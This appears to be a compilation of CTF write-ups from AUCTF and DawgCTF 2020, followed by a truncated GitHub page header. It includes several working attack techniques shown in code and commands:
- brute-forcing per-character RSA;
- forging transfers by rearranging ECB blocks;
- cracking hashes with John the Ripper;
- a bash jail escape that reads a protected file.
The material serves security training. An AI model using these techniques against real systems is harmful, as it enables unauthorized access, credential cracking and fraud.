> Alice and Bob like to send each other encrypted messages. Eve intercepted one of those messages but doesn't know what to do with it.> > She knows that Bob's public key is (n,e) = (20312493432722984634615913227523125265781662152013094377607630781356105942700273581600613724248110835803158659086732527322062709047441686884292861771528866639670389435647460159612029672461252955594829829663172687201461554413049025271464412190235617740846789840419025423396967519520427432799227162339126087426790939948330768088600429869826069490486741417370162186831426441346576810446894902659826134877586519596679449287778809427232767231366708775004671368581690484301650399106765403344734339945464967775820750215294237822308697430395972800155973323880641007064174229976873404987801414040860359400339131120435868680687, 65537)> > You can download the file they were given at the following link: https://drive.google.com/file/d/1hLMbGIcHtZztIpo8t-6gbZryhnJcG1QH/view?usp=sharing
The file contains the following:```[2412288710434803394325176302030468602332709509311261143213660105436051377474943434821352204391721838391094315381960457432926655230840188063004267704110217562996169458737321422147946731024824906666581789481224658816667320712242183812495582365431358466421457338958297482318446752036156998046759116584692778102962227510956304634319673372386442935449493449571951014061135438098777831213738694319264871993054355739648850198401208660679119608287231277223330049800856485854048034076593360115933185266555106462189543603546500451391092789804740311728163218531654743934699161954489811160497924455252382430259665344226005589347, 4662244614481813573605424119126644876253617822761086977288944256748253172049152895283835285197942460107100639460725911487653228318143490793643886766659418932464516271704300924229817717506546624597745450582808476115888422680291782220162004150600402753933990809607808329788541808351295733460528312120185127926061134106046844047543905543159332742611020978955776656246495124585638018893950754232515884963378422307924949629539205551516343049930064201297659168924875147225592455456266529935523931058354274895303194139310196368597695032712292358385042137122599970681963372287225693772146511056611914691897651969859481791738, 12063404184597232404323191243850651767007295266547011829578075758182531208671092480607343538388450277669022734103195085335379453509513928281873248621822304221535910976898189043438151642195662401534323194805294363709940776238048702852641738949402011411364230898498892721433997197353442189049609705253970415482575225470252945036637259407162734288203452962405448110624034513372135117708937804305185686067759553911606385985218168514851708713854774534268652136104206983382772232368346294401708885399333595608729871189892495869786648151489184098357431988262435191288083393719085655077650503402400856646850476286449510347919, ...]```(the end of the file is not displayed).
## Solution
We recognize a RSA encrypted message.
Contrary to the challenge `Pretty Ridiculous`, it seems unlikely we'll be able to factorize `n`.
However the ciphertext is in a particular way: instead of having the whole message encoded as one integer, it seems that every character is encrypted one by one... Let's check this: first character is supposed to be `a` because of the flag format, so let's compute `97 ^ e mod n`: it matches our first number in the file (`97` is the ASCII encoding of `a`).
Therefore we can just encrypt every ASCII character and compare them with our ciphertext! Let's do this with Python:
```pythonN = 20312493432722984634615913227523125265781662152013094377607630781356105942700273581600613724248110835803158659086732527322062709047441686884292861771528866639670389435647460159612029672461252955594829829663172687201461554413049025271464412190235617740846789840419025423396967519520427432799227162339126087426790939948330768088600429869826069490486741417370162186831426441346576810446894902659826134877586519596679449287778809427232767231366708775004671368581690484301650399106765403344734339945464967775820750215294237822308697430395972800155973323880641007064174229976873404987801414040860359400339131120435868680687e = 65537
with open(file, 'r') as f: sinit = f.readlines()[0]s = sinit[1:-1]list_char = s.split(',')
dic = {}for i in range(33, 300): code = i**e % N dic[code] = chr(i) ans = ''for c in list_char : ans += dic[int(c)]print(ans)```
Flag: `auctf{D0nT_5igN_r4nd0m_Cr4P_w1tH_y0uR_pr1vAT3_k3y_d00d}` |
I could provide a script for this write up, but honestly I think it's a lot easier to explain how to do it manually. So, if you do all 10 transactions somewhat randomly and then view the transactions, it becomes very clear that it is using ECB, the transaction is just `<sender id><receiver id><transaction ammount>` all encoded however they were, it doesn't really matter. (This is verified if you give a failed encrypted transaction, it will tell you the transaction format). With this information, you can view the 20 listed transactions to extract your id, the ids of the three users, and the encoded value that they sent. Furthermore, if you look at the special transaction, it tells you that it's worth 500 dollars. From this, we can view the encrypted transaction and extract the encrypted value of $500. In my case, these values were as follows:
my id: c5dfb849d2633ee054b7fb2b2b303d08
first id: 69d03a78057d10e19d9397a0b89a967e
second id: 1605edc1b3fbba02d49f7764a41a3491
third id: 9abfc29e9b39b342b87ec03bcfe21be7
500 ammt: 5ea121b5f1cb3b4607e555a8bc87fbb4
Therefore, we can just put these together in any order we want and have a valid transaction. For example, `69d03a78057d10e19d9397a0b89a967ec5dfb849d2633ee054b7fb2b2b303d085ea121b5f1cb3b4607e555a8bc87fbb4` would send 500 dollars from user 1's account, to my account. Repeat this for all three user accounts and then you have enough money to buy the flag!
`flag{bank$_sh0uld_n07_us3_ECB}` |
When I saw that we had to socialize, I was thrown off at first, as being an introvert, the idea of socializing with others made me nervous and scared. What was this mysterious site called “Discord”? I felt scared clicking on weird links, so I searched up what discord was. I got the answer of Discord is the easiest way to communicate over voice, video, and text, whether you’re part of a school club, a nightly gaming group, a worldwide art community, or just a handful of friends that want to hang out. Me not having friends made me sad, so I went on Instagram to find some friends so I could join discord. Luckily, this wonderful guy named willwam reached out to me and offered to be my friend, so I could sign up for discord. I then had to go and wake my mother up, to ask if I could download something off of the internet. She went over to my computer, and thankfully said yes. I then had to sign up for a discord account.. Email? What’s an email? I asked my newly found friend willwam about what an email was, and he reluctantly told me what this mystical piece of technology was. With this new found knowledge, I could finally sign up for a discord account, making me overjoyed that I could obtain the 10 great points for The WINRaRs. However, I had to do this for The WINRaRs, meaning that I went and joined the discord server. Once I joined, I was confused, as there were many skids also searching for the joy of the flag. However, I checked the channel topic of #genral, and there it was, the beautiful flag! I jumped out my chair with joy, and started dancing, as I found the mysterious flag of DawgCTF{h3y_wh@ts_uP_h3ll0} |
# Mr Game and Watch
## Description
> My friend is learning some wacky new interpreted language and different hashing algorithms. He's hidden a flag inside this program but I cant find it...> > He told me to connect to challenges.auctf.com 30001 once I figured it out though.
We are given a `.class` file.
## Solution
Let's reverse it using an online [Java decompiler](http://www.javadecompilers.com/).
```javaimport java.security.MessageDigest;import java.io.IOException;import java.io.Reader;import java.io.BufferedReader;import java.io.FileReader;import java.util.Arrays;import java.util.Scanner;
// // Decompiled by Procyon v0.5.36//
public class mr_game_and_watch{ public static String secret_1; public static int[] secret_2; public static int[] secret_3; public static int key_2; public static int key_3; public static void main(final String[] array) { System.out.println("Welcome to the Land of Interpreted Languages!"); System.out.println("If you are used to doing compiled languages this might be a shock... but if you hate assembly this is the place to be!"); System.out.println("\nUnfortunately, if you hate Java, this may suck..."); System.out.println("Good luck!\n"); if (crackme()) { print_flag(); } } private static boolean crackme() { final Scanner scanner = new Scanner(System.in); if (crack_1(scanner) && crack_2(scanner) && crack_3(scanner)) { System.out.println("That's correct!"); scanner.close(); return true; } System.out.println("Nope that's not right!"); scanner.close(); return false; } private static boolean crack_1(final Scanner scanner) { System.out.println("Let's try some hash cracking!! I'll go easy on you the first time. The first hash we are checking is this"); System.out.println(invokedynamic(makeConcatWithConstants:(Ljava/lang/String;)Ljava/lang/String;, mr_game_and_watch.secret_1)); System.out.print("Think you can crack it? If so give me the value that hashes to that!\n\t"); return hash(scanner.nextLine(), "MD5").compareTo(mr_game_and_watch.secret_1) == 0; } private static boolean crack_2(final Scanner scanner) { System.out.println("Nice work! One down, two to go ..."); System.out.print("This next one you don't get to see, if you aren't already digging into the class file you may wanna try that out!\n\t"); return hash(scanner.nextLine(), "SHA1").compareTo(decrypt(mr_game_and_watch.secret_2, mr_game_and_watch.key_2)) == 0; } private static boolean crack_3(final Scanner scanner) { System.out.print("Nice work! Here's the last one...\n\t"); return Arrays.equals(encrypt(hash(scanner.nextLine(), "SHA-256"), mr_game_and_watch.key_3), mr_game_and_watch.secret_3); } private static int[] encrypt(final String s, final int n) { final int[] array = new int[s.length()]; for (int i = 0; i < s.length(); ++i) { array[i] = (s.charAt(i) ^ n); } return array; } private static String decrypt(final int[] array, final int n) { String s = ""; for (int i = 0; i < array.length; ++i) { s = invokedynamic(makeConcatWithConstants:(Ljava/lang/String;C)Ljava/lang/String;, s, (char)(array[i] ^ n)); } return s; } private static void print_flag() { final String fileName = "flag.txt"; try { final BufferedReader bufferedReader = new BufferedReader(new FileReader(fileName)); try { String line; while ((line = bufferedReader.readLine()) != null) { System.out.println(line); } bufferedReader.close(); } catch (Throwable t) { try { bufferedReader.close(); } catch (Throwable exception) { t.addSuppressed(exception); } throw t; } } catch (IOException ex) { System.out.println("Could not find file please notify admin"); } } public static String hash(final String s, final String algorithm) { String string = null; try { final byte[] digest = MessageDigest.getInstance(algorithm).digest(s.getBytes("UTF-8")); final StringBuilder sb = new StringBuilder(2 * digest.length); final byte[] array = digest; for (int length = array.length, i = 0; i < length; ++i) { sb.append(String.format("%02x", array[i] & 0xFF)); } string = sb.toString(); } catch (Exception ex) { System.out.println("broke"); } return string; } static { mr_game_and_watch.secret_1 = "d5c67e2fc5f5f155dff8da4bdc914f41"; mr_game_and_watch.secret_2 = new int[] { 114, 118, 116, 114, 113, 114, 36, 37, 38, 38, 120, 121, 33, 36, 37, 113, 117, 118, 118, 113, 33, 117, 121, 37, 119, 34, 118, 115, 114, 120, 119, 114, 36, 120, 117, 120, 38, 114, 35, 118 }; mr_game_and_watch.secret_3 = new int[] { 268, 348, 347, 347, 269, 256, 348, 269, 256, 256, 344, 271, 271, 264, 266, 348, 257, 266, 267, 348, 269, 266, 266, 344, 267, 270, 267, 267, 348, 349, 349, 265, 349, 267, 256, 269, 270, 349, 268, 271, 351, 349, 347, 269, 349, 271, 257, 269, 344, 351, 265, 351, 265, 271, 346, 271, 266, 264, 351, 349, 351, 271, 266, 266 }; mr_game_and_watch.key_2 = 64; mr_game_and_watch.key_3 = 313; }}```
To win the game, we need to provide three correct passwords. For the first password, the hash is given, and we know it is hashed using MD5. A simple Google search yields `masterchief`.
The second password is verified as follow:
```SHA1(input) ?= decrypt(secret_2, key_2)```
To get the hash of the password, we need to decrypt the secret with the given key. From the decrypt function, decryption is a simple Caesar cipher (we need to XOR each value with `key_2`).
```pythonsecret = [114, 118, 116, 114, 113, 114, 36, 37, 38, 38, 120, 121, 33, 36, 37, 113, 117, 118, 118, 113, 33, 117, 121, 37, 119, 34, 118, 115, 114, 120, 119, 114, 36, 120, 117, 120, 38, 114, 35, 118]hash = [c ^ 64 for c in secret]print(''.join([chr(c) for c in hash]))```
Then we can pass it to [John](https://www.openwall.com/john/) to reverse it:
```bashjohn --format=raw-SHA1 --wordlist=rockyou.txt hash.txt```
Result: `princesspeach`
Third password is actually recovered with the same method, except that the key changes and the hash function is SHA-256. Password: `solidsnake`.
Let's connect to the service and enter the passwords:

Flag: `auctf{If_u_h8_JAVA_and_@SM_try_c_sharp_2922}` |
We were given a restricted bash jail with alot of filtered chars. Our goal is to read .flag file content. We made a script that automates generating commands using allowed chars.
**Final Command:** `bash<<<{cat,.flag}` |
The team at UMBC put on a great CTF over the Easter weekend of 2020. This CTF has a set of problems that you don’t see too often. Many times groups will have you do RECON type challenges over the Internet, but the UMBC Cyber Dawgs created their own internet for us to use for these challenges.
Check out my full solve for all five challenges here: https://www.wclaymoody.com/blog/dawgctf-impossible-pentest |
ECDSA time(second) based k without source code, can query 2 different messages with same k in a second.
Need to guess curve which is curve P-192 of NIST Digital Signature Stadnard and HASH function which is SHA-1. |
The team at UMBC put on a great CTF over the Easter weekend of 2020. This CTF has a set of problems that you don’t see too often. Many times groups will have you do RECON type challenges over the Internet, but the UMBC Cyber Dawgs created their own internet for us to use for these challenges.
Check out my full solve for all five challenges here: https://www.wclaymoody.com/blog/dawgctf-impossible-pentest |
# Who made me
## Description
> One of the developers of this CTF worked really hard on this challenge.> > note: the answer is not the author's name> > Author: c
## Solution
I've looked at Github repositories with AUCTF in it, using search in Github. There were not a lot at the time of the challenge.

I've looked at them one by one, and repo by `chharles` looks suspicious because empty.

Yet we see 6 commits, so let's look at them. In one of them we see the flag.

Flag: `auctf{G1tHuB_4lwAY5_r3mEmB3r5_8923_1750921}` |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-fe3f886b577a.css" /><link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/dark-a1dbeda2886c.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-1ad5cf51dfeb.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-11d3505dc06a.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-8b800495504f.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-daa38c88b795.css" /><link data-color-theme="light_high_contrast" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_high_contrast-1b9ea565820a.css" /><link data-color-theme="light_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_tritanopia-e4be9332dd6c.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-0dcf95848dd5.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/primer-c581c4e461bb.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/global-0e278d45156f.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/github-dcaf0f44dbb1.css" /> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/code-26709f54a08d.css" />
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-774bfe5ae983.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-327bbf-0aaeb22dd2a5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ui_packages_soft-nav_soft-nav_ts-21fc7a4a0e8f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/environment-e059fd03252f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-2646a2c533e3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-63debe-c04540d458d4.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-b9368a9cb79e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_fzy_js_index_js-node_modules_github_markdown-toolbar-element_dist_index_js-e3de700a4c9d.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-6afc16-e779583c369f.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_text-ex-3415a8-7ecc10fb88d0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-79182d-befd2b2f5880.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_view-components_app_components_primer_primer_js-node_modules_gith-6a1af4-df3bc95b06d3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/github-elements-fc0e0b89822a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-1641411db24a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-9d9fe1859ce5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_manuelpuyol_turbo_dist_turbo_es2017-esm_js-4140d67f0cc2.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-424aa982deef.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_hotkey_dist_-9fc4f4-d434ddaf3207.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-35b3ae68c408.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_session-resume_dist-def857-2a32d97c93c5.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-15ddcc-1512e06cfee0.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-430cacb5f7df.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_keyboard-shortcuts-helper_ts-app_assets_modules_github_be-f5afdb-8dd5f026c5b9.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-0af96d15a250.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_include-fragment_ts-app_assets_modules_github_behaviors_r-4077b4-75370d1c1705.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-7883159efa9e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-742151da9690.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-06ff531-32d7d1e94817.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/notifications-global-f5b58d24780b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-node_modules_github_template-parts_lib_index_js-58417dae193c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_memoize_dist_esm_index_js-8496b7c4b809.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-0370b887db62.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-7bdefeb88a1a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-d1ede1f1114e.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-a33094-b03defd3289b.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-85225b-226fc85f9b72.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/repositories-8093725f8825.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-7a1f0da7430a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-89d93a449480.js"></script>
<title>ctf-writeups/Byte Bandits CTF 2020/pwn/write at master · KEERRO/ctf-writeups · GitHub</title>
<meta name="route-pattern" content="/:user_id/:repository/tree/*name(/*path)">
<meta name="current-catalog-service-hash" content="343cff545437bc2b0304c97517abf17bb80d9887520078e9757df416551ef5d6">
<meta name="request-id" content="C138:0D35:12A25110:1322E24B:64122138" data-pjax-transient="true"/><meta name="html-safe-nonce" content="2985fd8a359bceddf8af3ff3fe3546d06a2beb78a27e1f3b1cbc862e474d6b44" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJDMTM4OjBEMzU6MTJBMjUxMTA6MTMyMkUyNEI6NjQxMjIxMzgiLCJ2aXNpdG9yX2lkIjoiMjY5NTI3NzgyNzQ0ODc3NDk2OCIsInJlZ2lvbl9lZGdlIjoiZnJhIiwicmVnaW9uX3JlbmRlciI6ImZyYSJ9" data-pjax-transient="true"/><meta name="visitor-hmac" content="654eb7e14abbccc48a73bf46877e8f47120a54c0f97c7f6cda9493a9ef02493f" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:162845937" data-turbo-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code,file-tree" data-turbo-transient="true" />
<meta name="selected-link" value="repo_source" data-turbo-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc"> <meta name="google-site-verification" content="Apib7-x98H0j5cPqHWwSMm6dNU4GmODRoqxLiDzdx9I">
<meta name="octolytics-url" content="https://collector.github.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-turbo-transient="true" />
<meta name="user-login" content="">
<meta name="viewport" content="width=device-width"> <meta name="description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/e68933ac284b7f665c8ea555e19d7e6118920c67571ea8ca1312106e9058e23e/KEERRO/ctf-writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="ctf-writeups/Byte Bandits CTF 2020/pwn/write at master · KEERRO/ctf-writeups" /><meta name="twitter:description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/e68933ac284b7f665c8ea555e19d7e6118920c67571ea8ca1312106e9058e23e/KEERRO/ctf-writeups" /><meta property="og:image:alt" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="ctf-writeups/Byte Bandits CTF 2020/pwn/write at master · KEERRO/ctf-writeups" /><meta property="og:url" content="https://github.com/KEERRO/ctf-writeups" /><meta property="og:description" content="Contribute to KEERRO/ctf-writeups development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/">
<meta name="hostname" content="github.com">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="TURBO_EXPERIMENT_RISKY,IMAGE_METRIC_TRACKING,GEOJSON_AZURE_MAPS">
<meta http-equiv="x-pjax-version" content="ef97471de14f8d2285f0269e8f0f7dc70845f693d3f6ccd2dd2daae5cd1bbebe" data-turbo-track="reload"> <meta http-equiv="x-pjax-csp-version" content="2a84822a832da97f1ea76cf989a357ec70c85713a2fd8f14c8421b76bbffe38c" data-turbo-track="reload"> <meta http-equiv="x-pjax-css-version" content="adfc12179419e463f9f320d07920b1684c9b7e060d4d9cd3a6cd5d0de37ce710" data-turbo-track="reload"> <meta http-equiv="x-pjax-js-version" content="711646ae23abb27cf728346f30f81c042d4428233a0795acf0e21ed664fe9d94" data-turbo-track="reload">
<meta name="turbo-cache-control" content="no-preview" data-turbo-transient="">
<meta data-hydrostats="publish">
<meta name="go-import" content="github.com/KEERRO/ctf-writeups git https://github.com/KEERRO/ctf-writeups.git">
<meta name="octolytics-dimension-user_id" content="46076094" /><meta name="octolytics-dimension-user_login" content="KEERRO" /><meta name="octolytics-dimension-repository_id" content="162845937" /><meta name="octolytics-dimension-repository_nwo" content="KEERRO/ctf-writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="162845937" /><meta name="octolytics-dimension-repository_network_root_nwo" content="KEERRO/ctf-writeups" />
<link rel="canonical" href="https://github.com/KEERRO/ctf-writeups/tree/master/Byte%20Bandits%20CTF%202020/pwn/write" data-turbo-transient> <meta name="turbo-body-classes" content="logged-out env-production page-responsive">
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;"> <div data-turbo-body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-04fa93bb158a.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/sessions-9920eaa99f50.js"></script><header class="Header-old header-logged-out js-details-container Details position-relative f4 py-3" role="banner"> <button type="button" class="Header-backdrop d-lg-none border-0 position-fixed top-0 left-0 width-full height-full js-details-target" aria-label="Toggle navigation"> <span>Toggle navigation</span> </button>
<div class="container-xl d-flex flex-column flex-lg-row flex-items-center p-responsive height-full position-relative z-1"> <div class="d-flex flex-justify-between flex-items-center width-full width-lg-auto"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg>
<div class="flex-1"> Sign up </div>
<div class="flex-1 flex-order-2 text-right"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target Button--link Button--medium Button d-lg-none color-fg-inherit p-1"> <span> <span><div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div> <div class="HeaderMenu-toggle-bar rounded my-1"></div></span> </span></button> </div> </div>
